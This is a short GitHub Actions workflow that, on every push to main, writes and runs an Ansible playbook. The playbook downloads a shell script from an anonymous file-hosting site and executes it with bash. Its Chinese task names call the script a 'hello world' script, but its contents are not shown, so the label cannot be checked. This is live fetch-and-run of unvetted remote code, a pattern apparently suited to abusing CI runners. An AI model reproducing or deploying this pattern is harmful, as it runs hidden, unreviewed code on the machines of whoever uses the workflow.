name: Run Ansible Playbook

on:
  push:
    branches:
      - main

jobs:
  run-ansible:
    runs-on: ubuntu-latest
    
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Install Ansible
        run: |
          sudo apt update
          sudo apt install -y ansible

      - name: Create Ansible Playbook
        run: |
          cat <<EOF > playbook.yml
          - hosts: localhost
            tasks:
              - name: 下载 hello world 脚本
                ansible.builtin.get_url:
                  url: "https://files.catbox.moe/uh19yg.sh"
                  dest: "/tmp/uh19yg.sh"
                  mode: "0755"

              - name: 运行 hello world 脚本
                ansible.builtin.command: "bash /tmp/uh19yg.sh"
          EOF

      - name: Run Ansible Playbook
        run: ansible-playbook playbook.yml
